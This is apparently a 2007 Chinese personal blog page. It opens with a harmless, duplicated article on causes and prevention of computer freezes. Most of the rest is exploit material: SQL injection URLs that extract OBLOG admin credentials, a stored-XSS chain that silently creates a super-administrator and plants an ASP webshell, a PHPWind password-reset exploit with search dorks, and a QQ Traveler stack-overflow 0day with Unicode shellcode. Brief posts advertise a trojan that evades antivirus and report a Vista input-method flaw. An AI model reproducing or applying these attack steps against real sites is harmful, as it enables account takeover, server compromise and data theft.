系统死机的原因及预防方法
作者:天晴无名氏 日期:2007-04-24 18:37
如今的计算机已经接近全面普及的程度了,它给人们在工作和学习上提供了极大的方便,不过,计算机的“死机”对于普通的计算机用户来说,却成为了一个解不开、挣不脱的烦 恼。每当在计算机开机时、或启动操作系统时、或使用一些应用程序时、或正准备退出操作系统时,“死机”这一头“猛兽”随时都有可能迎面扑来。那么,怎么做才能避免计算机“死机”的烦恼呢?下面,笔者就根据导致“死机”的原因和预防的方法分为几点给大家介绍一下,希望下面的文章能给遇到此类问题的朋友一些帮助。
一、导致计算机“死机”的原因:
1.BIOS设置不当所造成的“死机”
每种硬件有自己默认或特定的工作环境,不能随便超越它的工作权限进行设置,否则就会因为硬件达不到这个要求而死机。例如:一款内存条只能支持到DDR 266,而在BIOS设置中却将其设为DDR 333的规格,这样做就会因为硬件达不到要求而死机,如果就算是能在短时间内正常的工作,电子元件也会随着使用时间的增加而逐渐老化,产生的质量问题也会导致计算机频繁的“死机”。 2.硬件或软件的冲突所造成的“死机”
计算机硬件冲突的“死机”主要是由中断设置的冲突而造成的,当发生硬件冲突的时候,虽然各个硬件勉强可以在系统中共存,但是不能同时的进行工作,比如能够上网的时候就不能听音乐等等。时间一长,中断的冲突就会频频的出现,最后将导致系统不堪重负,造成“死机”。
同样,软件也存在这种情况。由于不同的软件公司开发的软件越来越多,且这些软件在开发的过程中不可能做到彼此之间的完全熟悉和配合,因此,当一起运行这些软件的时候,很容易就发生大家都同时调用同一个DLL或同一段物理地址,从而发生冲突。此时的计算机系统由于不知道该优先处理哪个请求,造成了系统紊乱而致使计算机“死机”。
3.硬件的品质和故障所造成的“死机”
由于目前一些小品牌的计算机硬件产品往往没经过合格的检验程序就投放市场,其中,有很多质量不过关的硬件产品在品质完好计算机硬件的笼罩下是非常隐蔽的,普通人是不容易看出来的。就这些硬件产品来说,造成计算机经常“死机”的原因和它们有着非常直接的关系。另外,还有些硬件的故障是由于使用的年限太久而产生的。一般来说,内存条、CPU和硬盘等部件的寿命在超过三年后就很难保证了,从而也会产生很多隐蔽的“死机”问题。
4.计算机系统源耗尽所造成的“死机”
当计算机系统执行了错误的程序或代码时,会使系统的内部形成“死”循环的现象,原本就非常有限的系统资源会被投入到无穷无尽的重复运算当中,当运算到最后会因为计算机过大的使资源耗尽而造成“死机”。还有一点就是,在计算机操作系统中运行了大量的程序,使得系统内存资源不足而造成“死机”。
5.系统文件遭到破坏所造成的“死机”
系统文件主要是指在计算机系统启动或运行时起着关键性支持的文件,如果缺少了它们,整个计算机系统将无法正常的运行,当然“死机”也就在所难免了。造成系统文件被破坏的原因有很多,病毒和黑客程序的入侵是最主要的原因。另外,初级用户由于错误操作,删除了系统文件也会造成这种后果。
6.计算机内部散热不良所造成的“死机”
由于计算机内部的电子元器件的主要成分是硅(这是一种工作状态受温度影响很大的元素)。在计算机工作时电子元器件的温度就会随之而增高,其表面会发生电子迁移现象,从而改变当前工作状态,造成计算机在工作中突然“死机”。
7.初级用户的错误操作所造成的“死机”
对初级用户而言,在使用计算机过程中一些错误的操作也会造成系统的“死机”。比如热插拔硬件、在运行过程中震动计算机、随意删除文件或安装了超过基本硬件设置标准的软件等都可以造成“死机”。
8.其他方面造成的“死机”
除了笔者在上面所叙述的原因之外,还有很多千奇百怪的原因可能导致系统的“死机”。比如电压波动过大、光驱读盘能力下降、软盘质量不良、病毒或黑客程序的破坏等等原因。总之,导致计算机死机的原因是多方面的。
从上面的几点可见,计算机“死机”对一般用户来说并不是什么好事,不过也不是不可避免的,只要用户按照正常的电脑操作,相信“死机”的机率就会减小到最少。下面,笔者就计算机死机的原因所总结的一些经验给大家介绍一下。
二、计算机“死机”的预防:
1.保证正确的Bios设置。Bios里面的设置一定要合适,错误的Bios设置会使你在运行Windows的时候死机。
2.经常检查电脑配件接触情况。在板卡接触不良的情况下运行会引起系统死机,因此在更换电脑配件时,一定要使板卡与主机板充分接触。
3.定期清洁机箱。灰尘太多会使板卡之间接触不良,引起系统在运行中死机,因此机箱要随时清洁,不要让太多的灰尘积存在机箱中。
4.坚持认真查杀病毒。对来历不明的光盘或软盘,不要轻易使用,对邮件中的附件,要先用杀毒软件检查后再打开。
5.按正确的操作顺序关机。在应用软件未正常结束运行前,别关闭电源,否则会造成系统文件损坏或丢失,引起在启动或运行中死机。
6.避免多任务同时进行。在执行磁盘整理或用杀毒软件检查硬盘期间,不要运行其他软件,否则会造成死机。
7.勿过分求新。各种硬件的驱动不一定要随时更新,因为才开发的驱动程序往往里面有bug,会对系统造成损害,引起系统死机,最新的不一定是最好的。
8.在卸载软件时,用自带的反安装程序或Windows里面的安装/卸载方式,不要直接删除程序文件夹,因为某些文件可能被其他程序共享,一旦删除这些共享文件,会造成应用软件无法使用而死机。
9.设置硬件设备时,最好检查有无保留中断(IRQ),不要让其他设备使用该中断号,以免引起中断冲突,造成系统死机。
10.在上网冲浪的时候,不要打开太多的浏览器窗口,否则会导致系统资源不足,引起系统死机。
11.如果你的机器内存不是很大,千万不要运行占用内存较大的程序,如Photoshop,否则运行时容易死机。
12.对于系统文件或重要的文件,最好使用隐含属性,这样才不至于因错误操作删除这些文件,引起系统死机。
13.修改硬盘主引导记录时,最好先保存原来的记录,防止因修改失败而无法恢复原来的引导记录。
14.CPU、显卡等配件一般不要超频,若确实需要超,要注意超频后板卡的温度,CPU、显卡等长期在非正常频率和温度下工作轻则自动重启或死机,重者烧毁CPU、显卡、主板。
一、导致计算机“死机”的原因:
1.BIOS设置不当所造成的“死机”
每种硬件有自己默认或特定的工作环境,不能随便超越它的工作权限进行设置,否则就会因为硬件达不到这个要求而死机。例如:一款内存条只能支持到DDR 266,而在BIOS设置中却将其设为DDR 333的规格,这样做就会因为硬件达不到要求而死机,如果就算是能在短时间内正常的工作,电子元件也会随着使用时间的增加而逐渐老化,产生的质量问题也会导致计算机频繁的“死机”。 2.硬件或软件的冲突所造成的“死机”
计算机硬件冲突的“死机”主要是由中断设置的冲突而造成的,当发生硬件冲突的时候,虽然各个硬件勉强可以在系统中共存,但是不能同时的进行工作,比如能够上网的时候就不能听音乐等等。时间一长,中断的冲突就会频频的出现,最后将导致系统不堪重负,造成“死机”。
同样,软件也存在这种情况。由于不同的软件公司开发的软件越来越多,且这些软件在开发的过程中不可能做到彼此之间的完全熟悉和配合,因此,当一起运行这些软件的时候,很容易就发生大家都同时调用同一个DLL或同一段物理地址,从而发生冲突。此时的计算机系统由于不知道该优先处理哪个请求,造成了系统紊乱而致使计算机“死机”。
3.硬件的品质和故障所造成的“死机”
由于目前一些小品牌的计算机硬件产品往往没经过合格的检验程序就投放市场,其中,有很多质量不过关的硬件产品在品质完好计算机硬件的笼罩下是非常隐蔽的,普通人是不容易看出来的。就这些硬件产品来说,造成计算机经常“死机”的原因和它们有着非常直接的关系。另外,还有些硬件的故障是由于使用的年限太久而产生的。一般来说,内存条、CPU和硬盘等部件的寿命在超过三年后就很难保证了,从而也会产生很多隐蔽的“死机”问题。
4.计算机系统源耗尽所造成的“死机”
当计算机系统执行了错误的程序或代码时,会使系统的内部形成“死”循环的现象,原本就非常有限的系统资源会被投入到无穷无尽的重复运算当中,当运算到最后会因为计算机过大的使资源耗尽而造成“死机”。还有一点就是,在计算机操作系统中运行了大量的程序,使得系统内存资源不足而造成“死机”。
5.系统文件遭到破坏所造成的“死机”
系统文件主要是指在计算机系统启动或运行时起着关键性支持的文件,如果缺少了它们,整个计算机系统将无法正常的运行,当然“死机”也就在所难免了。造成系统文件被破坏的原因有很多,病毒和黑客程序的入侵是最主要的原因。另外,初级用户由于错误操作,删除了系统文件也会造成这种后果。
6.计算机内部散热不良所造成的“死机”
由于计算机内部的电子元器件的主要成分是硅(这是一种工作状态受温度影响很大的元素)。在计算机工作时电子元器件的温度就会随之而增高,其表面会发生电子迁移现象,从而改变当前工作状态,造成计算机在工作中突然“死机”。
7.初级用户的错误操作所造成的“死机”
对初级用户而言,在使用计算机过程中一些错误的操作也会造成系统的“死机”。比如热插拔硬件、在运行过程中震动计算机、随意删除文件或安装了超过基本硬件设置标准的软件等都可以造成“死机”。
8.其他方面造成的“死机”
除了笔者在上面所叙述的原因之外,还有很多千奇百怪的原因可能导致系统的“死机”。比如电压波动过大、光驱读盘能力下降、软盘质量不良、病毒或黑客程序的破坏等等原因。总之,导致计算机死机的原因是多方面的。
从上面的几点可见,计算机“死机”对一般用户来说并不是什么好事,不过也不是不可避免的,只要用户按照正常的电脑操作,相信“死机”的机率就会减小到最少。下面,笔者就计算机死机的原因所总结的一些经验给大家介绍一下。
二、计算机“死机”的预防:
1.保证正确的Bios设置。Bios里面的设置一定要合适,错误的Bios设置会使你在运行Windows的时候死机。
2.经常检查电脑配件接触情况。在板卡接触不良的情况下运行会引起系统死机,因此在更换电脑配件时,一定要使板卡与主机板充分接触。
3.定期清洁机箱。灰尘太多会使板卡之间接触不良,引起系统在运行中死机,因此机箱要随时清洁,不要让太多的灰尘积存在机箱中。
4.坚持认真查杀病毒。对来历不明的光盘或软盘,不要轻易使用,对邮件中的附件,要先用杀毒软件检查后再打开。
5.按正确的操作顺序关机。在应用软件未正常结束运行前,别关闭电源,否则会造成系统文件损坏或丢失,引起在启动或运行中死机。
6.避免多任务同时进行。在执行磁盘整理或用杀毒软件检查硬盘期间,不要运行其他软件,否则会造成死机。
7.勿过分求新。各种硬件的驱动不一定要随时更新,因为才开发的驱动程序往往里面有bug,会对系统造成损害,引起系统死机,最新的不一定是最好的。
8.在卸载软件时,用自带的反安装程序或Windows里面的安装/卸载方式,不要直接删除程序文件夹,因为某些文件可能被其他程序共享,一旦删除这些共享文件,会造成应用软件无法使用而死机。
9.设置硬件设备时,最好检查有无保留中断(IRQ),不要让其他设备使用该中断号,以免引起中断冲突,造成系统死机。
10.在上网冲浪的时候,不要打开太多的浏览器窗口,否则会导致系统资源不足,引起系统死机。
11.如果你的机器内存不是很大,千万不要运行占用内存较大的程序,如Photoshop,否则运行时容易死机。
12.对于系统文件或重要的文件,最好使用隐含属性,这样才不至于因错误操作删除这些文件,引起系统死机。
13.修改硬盘主引导记录时,最好先保存原来的记录,防止因修改失败而无法恢复原来的引导记录。
14.CPU、显卡等配件一般不要超频,若确实需要超,要注意超频后板卡的温度,CPU、显卡等长期在非正常频率和温度下工作轻则自动重启或死机,重者烧毁CPU、显卡、主板。
【最新漏洞】通杀OBLOG4.0 OBLOG4.5
作者:天晴无名氏 日期:2007-04-22 23:27
CODE:<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
Case 11
Call show_hotblog()
Case 12
Call show_teams()
Case 13
Call show_posts()
Case 14
Call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
Sub show_posts()
Dim teamid,postnum,l,u,t
teamid=Request(”tid”)
postnum=n
l=CInt(Request(”l”))
u=CInt(Request(”u”))
t=CInt(Request(”t”))
Dim rs,sql,sRet,sAddon
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
If teamid<>“” And teamid<>“0″ Then
teamid=Replace(teamid,”|”,”,”)
Sql=Sql & ” And teamid In (” & teamid & “) ”
End If
Sql=Sql & ” order by postid Desc”
Set rs=oblog.Execute(Sql)
sRet=”
”
Do While Not rs.Eof
sAddon=”\"
* sRet=sRet & “ ” & oblog.Filt_html(Left(rs(2),l)) & “”
If u=1 Then sAddon=rs(4)
if t=1 Then
If sAddon<>“” Then sAddon=sAddon & “,”
sAddon=sAddon & rs(3)
End If
If sAddon<>“” Then sAddon=”(” & sAddon & “)”
sRet=sRet & sAddon & “
”
rs.Movenext
Loop
Set rs = Nothing
sRet=sRet & “
”
Response.write oblog.htm2js (sRet,True)
End Sub调用show_posts()过程必须要符合上面的参数n=1,j=13
(” & teamid & “)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
document.write(’
*
‘);
gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password
跨出权限——世纪热线全站程序完美版漏洞利用
作者:天晴无名氏 日期:2007-04-15 01:32
CODE:作者:樱花浪子[I.S.T]
来源:红狼安全小组(www.wolfexp.net,www.crst.com.cn)
注:本文首发于黑客手册,.转载请注明来源
06年就这样像3389离我而去,07年就像4489在迎接着我们。不知不觉又长了一岁。06年可以说是注入淡却的一年。不过新的技术也在增长。
跨站虽然算不上新的技术。但在国外也是非常重视的。其实跨站代码如果构造好的话可以干出很多事来的。这不,在网上逛到了一个电影网站。
心想如果把这个站拿下来不就可以看免费的电影了。(动机不太好呀^_^)。发现程序用的是:"世纪热线全站程序完美版"于是去百度搜一下也没发有漏
洞。那么就自己下回来慢慢研究吧。
可以说这套程序在注入方面防范的还不错。但是跨站方面好象就没有做到家了。经过仔细的查找,终于被我找到了一点软胁。首先我们先注册
个用户。一般电影网站都提供影片报错的页面。这个也不例外。我们在首页随便点击一个影片。下面有个报告错误。点一下之后会打开一个页面。
因为这个报告错误只有管理员能看,我们在报告错误里写上" ",如图1所示。
<img src=\"http://hacklu.net/img/shiji/1.jpg\" style=\"cursor:pointer;\" onclick=\"open_img('http://hacklu.net/img/shiji/1.jpg')\" alt=\"http://hacklu.net/img/shiji/1.jpg\" width=\"733\" height=\"528\" />
点开始报告,我们再去后台的电影管理/错误报告去看一下,跨站代码被成功执行了。如图2所示。
<img src=\"http://hacklu.net/img/shiji/2.jpg\" style=\"cursor:pointer;\" onclick=\"open_img('http://hacklu.net/img/shiji/2.jpg')\" alt=\"http://hacklu.net/img/shiji/2.jpg\" width=\"736\" height=\"494\" />
既然这个能执行,我们在来构造一些特殊的
代码吧。后台有个添加管理员的,我们先来看看它的代码是怎么实现的,添加管理员的关键代码如下:
<table border=\"0\" cellspacing=\"1\" cellpadding=\"0\" width=\"396\"> <tr bgcolor=\"#0099ff\">
<td width=\"392\" height=\"25\">
<div align=\"center\">
<font size=\"2\">新增管理员</font></div>
</td> </tr> <tr> <td width=\"253\" height=\"30\" style=\"color: black; border-style: none\">
<div align=\"center\">
<font size=\"2\">用 户 名
</font>
</div>
</td> <td width=\"138\" height=\"30\" style=\"color: black; border-style: none\"> </td> </tr> <tr> <td width=\"253\" height=\"30\" style=\"color: black; border-style: none\">
<div align=\"center\">
<font size=\"2\">初始密码
</font>
</div>
</td> <td width=\"138\" height=\"30\" style=\"color: black; border-style: none\">
<span><font size=\"2\">数字+字母10位以上</font></span></td> </tr> <tr> <td width=\"253\" height=\"30\" style=\"color: black; border-style: none\">
<div align=\"center\">
<font size=\"2\">确认密码
</font>
</div>
</td> <td width=\"138\" height=\"30\" style=\"color: black; border-style: none\">
<span><font size=\"2\">数字+字母10位以上</font></span></td> </tr> <tr> <td width=\"253\" height=\"30\" style=\"color: black; border-style: none\">
<p align=\"center\">权限设置 <span>
</span>
====无管理权限====
====初级管理员====
====高级管理员====
====超级管理员====</p> </td> <td width=\"138\" height=\"30\" style=\"color: black; border-style: none\"> </td> </tr> </table>
其实这个我们只在稍稍改动一下就可以了,改好的代码如下:
<table border=\"0\" cellspacing=\"1\" cellpadding=\"0\" width=\"396\"> <tr bgcolor=\"#0099ff\">
<td width=\"392\" height=\"25\">
<div align=\"center\">
<font size=\"2\">新增管理员</font></div>
</td> </tr> <tr> <td width=\"253\" height=\"30\" style=\"color: black; border-style: none\">
<div align=\"center\">
<font size=\"2\">用 户 名 '添加管理员名字
</font>
</div>
</td> <td width=\"138\" height=\"30\" style=\"color: black; border-style: none\"> </td> </tr> <tr> <td width=\"253\" height=\"30\" style=\"color: black; border-style: none\">
<div align=\"center\">
<font size=\"2\">初始密码 '添加管理员密码
</font>
</div>
</td> <td width=\"138\" height=\"30\" style=\"color: black; border-style: none\">
<span><font size=\"2\">数字+字母10位以上</font></span></td> </tr> <tr> <td width=\"253\" height=\"30\" style=\"color: black; border-style: none\">
<div align=\"center\">
<font size=\"2\">确认密码 '确认管理员密码
</font>
</div>
</td> <td width=\"138\" height=\"30\" style=\"color: black; border-style: none\">
<span><font size=\"2\">数字+字母10位以上</font></span></td> </tr> <tr> <td width=\"253\" height=\"30\" style=\"color: black; border-style: none\">
<p align=\"center\">权限设置 <span>
</span>
====无管理权限==== '设置为超级管理员,注意这里是1
====初级管理员====
====高级管理员====
====超级管理员====</p> </td> <td width=\"138\" height=\"30\" style=\"color: black; border-style: none\"> </td> </tr> </table>
<p> </p>
<p align=\"center\">
</p>
最重要的就是action后的路径和最后自动运行的脚本,路径大家一定要对上。把上面的代码为hacklu.htm上传到自己的空间。然后再来到错误
报告的地方写上我们的挂马代码:,www.hacklu.net是我空
间的地址。这样管理员在看错误报告的时候就会添加一个名为:hacklu119的超级管理员。如图3、图4所示。
<img src=\"http://hacklu.net/img/shiji/3.jpg\" style=\"cursor:pointer;\" onclick=\"open_img('http://hacklu.net/img/shiji/3.jpg')\" alt=\"http://hacklu.net/img/shiji/3.jpg\" width=\"645\" height=\"488\" />
<img src=\"http://hacklu.net/img/shiji/4.jpg\" style=\"cursor:pointer;\" onclick=\"open_img('http://hacklu.net/img/shiji/4.jpg')\" alt=\"http://hacklu.net/img/shiji/4.jpg\" width=\"876\" height=\"472\" />
其实我们还可以构造备份WEBSHELL什么的,只是这个后台没有备份数据库的功能。所以得到WEBSHELL有一定的困难。刚开始我在添加电影的地
方上传ASP木马。又是抓名又是改扩展名的,可惜还没有成功。后来不经意发现原来这个数据库是ASP的,那么就好办了。只接在添加电影的地方
写上我们的一句话的ASP木马,如图5所示。
<img src=\"http://hacklu.net/img/shiji/5.jpg\" style=\"cursor:pointer;\" onclick=\"open_img('http://hacklu.net/img/shiji/5.jpg')\" alt=\"http://hacklu.net/img/shiji/5.jpg\" width=\"872\" height=\"644\" />
最后添加一下我们用客户端连接http://127.0.0.1/data/jdzcn.asp如图6所示,连接成功后会生成killbase.asp文件。最后成功得到WEBSHELL。见图7。
<img src=\"http://hacklu.net/img/shiji/6.jpg\" style=\"cursor:pointer;\" onclick=\"open_img('http://hacklu.net/img/shiji/6.jpg')\" alt=\"http://hacklu.net/img/shiji/6.jpg\" width=\"938\" height=\"551\" />
<img src=\"http://hacklu.net/img/shiji/7.jpg\" style=\"cursor:pointer;\" onclick=\"open_img('http://hacklu.net/img/shiji/7.jpg')\" alt=\"http://hacklu.net/img/shiji/7.jpg\" width=\"830\" height=\"443\" />
不过如果数据库改了名字的话,那么得WEBSHELL就不容易了。最后欢迎大家到NOHACK/BBS和作者交流。本文作者ID是樱花浪子。 VIP灰鸽子完美过金山内存+专杀+葛军专杀+瑞星专杀!!(演示版)
作者:天晴无名氏 日期:2007-04-11 18:32
Vista+Google=严重安全漏洞
作者:天晴无名氏 日期:2007-04-09 01:51
一个ANI漏洞,逼迫微软提前一周发布补丁。昨天,记者从瑞星监测网获悉WindowsVista系统再现软档:Google(谷歌)公司最新发布的Google拼音输入法1.0版可能导致Vista系统出现漏洞,而且即便是普通玩家也能轻易通过该漏洞获得系统管理权限,而黑客更可以利用该漏洞对电脑进行多种危险操作。
“这个安全漏洞好比是门和门框之间出现的缝隙,微软和Google都有一定的责任。”瑞星安全专家表示,早在Windows2000系统刚刚问世的时候,就曾因为输入法漏洞而出现过类似问题,后来微软还发布了专门的补丁程序。“目前看来,Vista系统在防止输入法漏洞方面并没有得到改善,仍然十分容易遭到某些安全性能低下的输入法的影响。”
据悉,黑客可以利用该漏洞在无管理员密码的情况下登录系统,获得管理员权限,从而完全控制系统。黑客可以删除文件、格式化硬盘、安装木马……使Vista的安全机制行同虚设。Google输入法刚刚发布,网上就出现了利用该漏洞攻击Vista系统的“教程”,即使是不懂电脑的人也可以按照“教程”所提供的方法取得管理员权限。
昨天,记者登陆PChome等专业下载网站,发现Google输入法的使用范围不如搜狗、紫光广泛,但还是有不少发烧友争相下载使用。据悉,目前只测试出Google输入法有问题,但不排除在Vista系统上安装其它输入法软件也会形成这类漏洞。瑞星安全专家表示,从前段时间大家所关注的ANI漏洞到此次发现的输入法漏洞,表明WindowsVista系统在某些方面延续了Windows2000、WindowsXP等“前辈”的弱点,因此其宣称的“划时代”的安全性能实在令人不敢苟同。
【Exploits】PHPWind 5.x Exploits
作者:天晴无名氏 日期:2007-04-07 13:04
| PHPWind 5.x Exploits |
| |
| Powered by HamFast V1.12 20070101 |
| |
---------------------------------------------------------------/
ATTANTION: Only do this bug test on your board!//仅仅用来测试你的论坛安全!
Don't attack any other site!//不要用于攻击其他网站
-----------------------------------------------------------------
BUGS:
Here is a very dangerous bug for PHPWind 5.x!!!! You can change
any user's password or register as a new user.
Ofcouse, you can change the admin's password, then the board will
be under control.
Maybe 80% of PHPWind boards have this bug.
This tools can exploit PHPWind 5.0.1 AND PHPWind 5.3.
----------------------------------------------------------------
Board Search:
----------------------------------------------------------------
http://www.baidu.com/s?tn=baidu& ... PWind+v5.0&ct=0
http://www.google.com/search?new ... red+by+phpwind+v5.0
下载地址:http://bbs.hackbase.com/viewthread.php?tid=3106742&page=1#pid4620831
| |
| Powered by HamFast V1.12 20070101 |
| |
---------------------------------------------------------------/
ATTANTION: Only do this bug test on your board!//仅仅用来测试你的论坛安全!
Don't attack any other site!//不要用于攻击其他网站
-----------------------------------------------------------------
BUGS:
Here is a very dangerous bug for PHPWind 5.x!!!! You can change
any user's password or register as a new user.
Ofcouse, you can change the admin's password, then the board will
be under control.
Maybe 80% of PHPWind boards have this bug.
This tools can exploit PHPWind 5.0.1 AND PHPWind 5.3.
----------------------------------------------------------------
Board Search:
----------------------------------------------------------------
http://www.baidu.com/s?tn=baidu& ... PWind+v5.0&ct=0
http://www.google.com/search?new ... red+by+phpwind+v5.0
下载地址:http://bbs.hackbase.com/viewthread.php?tid=3106742&page=1#pid4620831
Google 也出拼音了。
作者:天晴无名氏 日期:2007-04-04 13:47
我现在用的是搜狗拼音 感觉非常不错 呵呵
想不到google也出拼音输入法了。 看看它的功能
智能组句:选词准确率高,能聪明地理解您的意图,短句长句都合适。
流行词汇:整合互联网上的流行词汇、热门搜索一网打尽,词组丰富强大。
网络同步:您可以将使用习惯和个人字典同步在 Google 帐号,一个跟您走的个性化输入法。
一键搜索:拼写输入的同时轻点一键即可快捷搜索。输入法结合搜索框一举两得。
英文提示:打英文时只需输入前几个字母,输入法自动提示您可能要找的单字。
网络同步字库,字库是不错呵呵。第一感觉比微软的拼音感觉要好 不知道有没比搜狗好呵呵
http://tools.google.com/pinyin/index.html
标签: 谷歌拼音输入法
QQ Traveler漏洞分析与利用(0day)
作者:天晴无名氏 日期:2007-04-02 12:43
failwest shineast
漏洞概述
腾讯TT(QQ Traveler)是一款多页面浏览器,具有亲切、友好的用户界面,提供多种皮肤供用户根据个人喜好使用,另外TT更是新增了多项人性化的特色功能,使上网冲浪变的更加轻松自如、省时省力。智能屏蔽一键开通, 最近浏览一键找回,多页面一键打开,浏览记录一键清除,多种皮肤随心变换,多线程高速旋风下载。
腾讯TT在处理地址栏输入的URL时,存在栈溢出漏洞。虽然其处理过程中对URL进行了Unicode编码,但是经过精心的构造,还是可以构造出可见的 Unicode字符串,来控制EIP指令寄存器,并构造支持Unicode的shellcode。这一点已经得到我们的证实!
漏洞分析
构造的URL如下:
http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeefffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffggggggggggggggggggggggggggg ... hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh蠀緑橨㠊栞襣俑㉨酴謌跴�ҷ�뭦㈳桓獵牥㍔擒媋謰ో䦋謜謉ࡩ㶭੪Ḹյユ悕䖋謼Ռ词⁙�S譇무ྙھ쐺ࡴ쫁̇䛐吻ᰤ�妋̤曝㲋譻᱙�Ⰳ閻ꭟ慗樽㠊甞㎩叛睨獥桴慦汩쒋偓卐埿叼埿
――――――――――――――――――――――――――――――――
其中蠀緑是7DD1 8800这个十六进制的unicode码,这个地址指向Window XP的shell32.dll中的某个JMP ESP指令的地址;
剩下的蓝色部分是一段支持unicode的shellcode,这段shellcode是failwest大侠所作,可以自动加载user32.dll动态链接库,并弹出对话框,显示“failwest”。
因此,如果把上面的url填入腾讯TT的地址栏,并执行了shellcode,即弹出了对话框,那么就可以说明这个漏洞的存在
因此可以证明这个漏洞的存在,下面我们用ollyDBG来跟踪分析一下:
0053AE1D |. 8B35 30825600 MOV ESI,DWORD PTR DS:[] ; msvcrt.wcslen
0053AE23 |. 55 PUSH EBP ; /s 指向URL的堆地址
0053AE24 |. FFD6 CALL ESI ; wcslen 进行长度URL的计算
0053AE26 |. 83C4 04 ADD ESP,4
0053AE29 |. 85C0 TEST EAX,EAX ;EAX此时是URL的长度
0053AE2B |. 0F84 3B010000 JE TTravele.0053AF6C ;如果URL的长度为0,则退出
0053AE31 |. 68 D0CA5A00 PUSH TTravele.005ACAD0 ; /wstr2 = "about:blank"
0053AE36 |. 55 PUSH EBP ; |wstr1
0053AE37 |. FF15 38825600 CALL DWORD PTR DS:[] ; \_wcsicmp 让URL与"about:blank"比较
0053AE3D |. 83C4 08 ADD ESP,8
0053AE40 |. 85C0 TEST EAX,EAX ;如果URL和"about:blank"相同
0053AE42 |. 0F84 24010000 JE TTravele.0053AF6C ;就退出
0053AE48 |. A1 E4125C00 MOV EAX,DWORD PTR DS:[5C12E4]
0053AE4D |. 33DB XOR EBX,EBX
0053AE4F |. 85C0 TEST EAX,EAX
0053AE51 |. 76 32 JBE SHORT TTravele.0053AE85 ;跳0053AE85
0053AE53 |. BF 00705B00 MOV EDI,TTravele.005B7000
0053AE58 |> 55 /PUSH EBP ; /wstr2
0053AE59 |. 57 |PUSH EDI ; |wstr1
0053AE5A |. FF15 38825600 |CALL DWORD PTR DS:[] ; \_wcsicmp
0053AE60 |. 83C4 08 |ADD ESP,8
0053AE63 |. 85C0 |TEST EAX,EAX
0053AE65 |. 74 12 |JE SHORT TTravele.0053AE79
0053AE67 |. A1 E4125C00 |MOV EAX,DWORD PTR DS:[5C12E4]
0053AE6C |. 43 |INC EBX
0053AE6D |. 81C7 4A100000 |ADD EDI,104A
0053AE73 |. 3BD8 |CMP EBX,EAX
0053AE75 |.^72 E1 JB SHORT TTravele.0053AE58
0053AE77 |. EB 0C JMP SHORT TTravele.0053AE85
0053AE79 |> 3B1D E4125C00 CMP EBX,DWORD PTR DS:[5C12E4]
0053AE7F |. 0F82 E7000000 JB TTravele.0053AF6C
